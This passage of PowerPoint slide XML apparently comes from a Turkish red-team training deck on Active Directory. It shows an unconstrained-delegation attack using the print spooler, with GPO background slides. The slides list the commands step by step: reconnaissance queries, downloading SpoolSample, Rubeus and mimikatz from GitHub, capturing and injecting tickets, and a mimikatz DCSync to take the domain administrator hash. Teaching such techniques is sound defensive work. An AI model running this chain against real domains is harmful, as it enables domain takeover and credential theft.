              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>DCSync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>saldırısı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>gerçekleştirilebilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>saldırı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yöntemi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> hem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>domainler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>arası</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> hem de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>forestlar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>arası</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>geçiş</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>diğer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yöntemlere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>nazaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>daha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>az</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yetkiyle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>gerçekleştirilebilmektedir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61451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9F98A-2D8F-1223-5925-D20B5F897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TTP 0x20 – Unconstrained Delegation w/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>Spoolsvc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="40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6C97D-1363-416A-3AA3-227F32000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# Unconstrained delegation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aktif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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bilgisayarların</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Neo4j </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ile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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tespit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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>edilmesi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</a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>MATCH (n) WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>n.unconstraineddelegation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> = True RETURN n.name </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t># Unconstrained delegation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aktif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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bilgisayarların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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Powershell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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ile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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tespit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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>edilmesi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</a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>ADComputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> -Filter * -Properties </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>TrustedForDelegation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> | Where-Object { $_.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>TrustedForDelegation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> -eq $true}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26003862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1A05C-F0AC-406D-B9E8-251ABC5C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TTP 0x20 – Unconstrained Delegation w/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>Spoolsvc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="40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EC028-A813-5E6A-1E9C-EEB919678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>
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SpoolSample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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>indiriliyor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</a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>iwr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> -Uri https://github.com/forestallio/ActiveDirectoryRedTeaming/raw/main/SpoolSample.exe -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>OutFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> SpoolSample.exe </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t># Rubeus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>indiriliyor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</a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>iwr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> -Uri https://github.com/forestallio/ActiveDirectoryRedTeaming/raw/main/Rubeus.exe -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>OutFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Rubeus.exe </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mimikatz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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>indiriliyor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</a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>iwr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> -Uri https://github.com/forestallio/ActiveDirectoryRedTeaming/raw/main/mimikatz_trunk/x64/mimikatz.exe - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>OutFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> mimikatz.exe </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t># Rubeus TGT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>biletlerini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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>izleyebilmek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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>için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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>monitör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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>modda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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>başlatılıyor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</a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>.\Rubeus.exe monitor /interval:5 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>nowrap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t># Parent domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dc’si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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>için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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SpoolSample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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tetikleniyor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</a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>.\SpoolSample.exe DC01 WEB01 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2602842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B742-9543-B305-2A49-A0B7DD922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 err="1"/>
              <a:t>Mantıksal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Birimler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Obje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Türleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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DC1EAB-22E9-387A-4179-CD93525F24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sz="1800" b="1" dirty="0"/>
              <a:t>GPO (Group Policy Object)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Objelerin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>merkezi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>şekilde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yönetimini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sağlayabilmek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>adına</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kullanılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>politika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>dokümanlarıdır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Kullanıcılara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bilgisayarlara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>uygulanabilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Group Policy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>objeleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Domain, OU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yapıları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>üzerinden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>uygulanabilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Managed Service Account: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Servis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>hesaplarının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>otomatize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şekilde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yönetimini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sağlamak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>adına</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>oluşturulmuş</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>objelerdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>objelerin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>parolaları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>otomatize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şekilde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>belirlenmekte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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en-US" sz="1800" dirty="0" err="1"/>
              <a:t>periyodik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>değiştirilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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0B74CA-931A-3A7A-1648-E95DC8D19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291366"/>
            <a:ext cx="5181600" cy="34198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11106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643B2-F860-F6CF-E065-60BB626D0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TTP 0x20 – Unconstrained Delegation w/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>Spoolsvc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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82F629-38C3-ACC5-3B72-E7061D575D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3128" y="1397765"/>
            <a:ext cx="7607691" cy="11303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E5FB14-A3B4-7F04-7855-443D0076F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8" y="2666837"/>
            <a:ext cx="10829923" cy="332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0752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39426-36DE-2C21-681C-90DFEBF42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TTP 0x20 – Unconstrained Delegation w/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>Spoolsvc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11166-FA6F-93D0-B9DB-CEC9C7F33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accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t># Elde </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>edilen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ticket </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rubeus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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ediliyor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Pass-The-Ticket </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>.\Rubeus.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ptt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> /ticket: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ticketlar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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>görüntüleniyor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</a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Klist</a:t>
            </a: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87D1A7-D711-6046-48FE-F13873EB0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5" y="3309522"/>
            <a:ext cx="7753350" cy="260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763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AABC1-9898-7982-1A23-F996D563A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sz="4000" dirty="0"/>
              <a:t>TTP 0x20 – Unconstrained Delegation w/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>Spoolsvc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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97CDEB-E82D-0625-2165-87FA9DBE5A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accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DcSync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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> parent domain administrator hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>değeri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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alınıyor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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>.\mimikatz.exe "privilege::debug" "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>lsadump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>dcsync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>domain:INTERNAL.LOCAL</a:t>
            </a:r>
            <a:r>
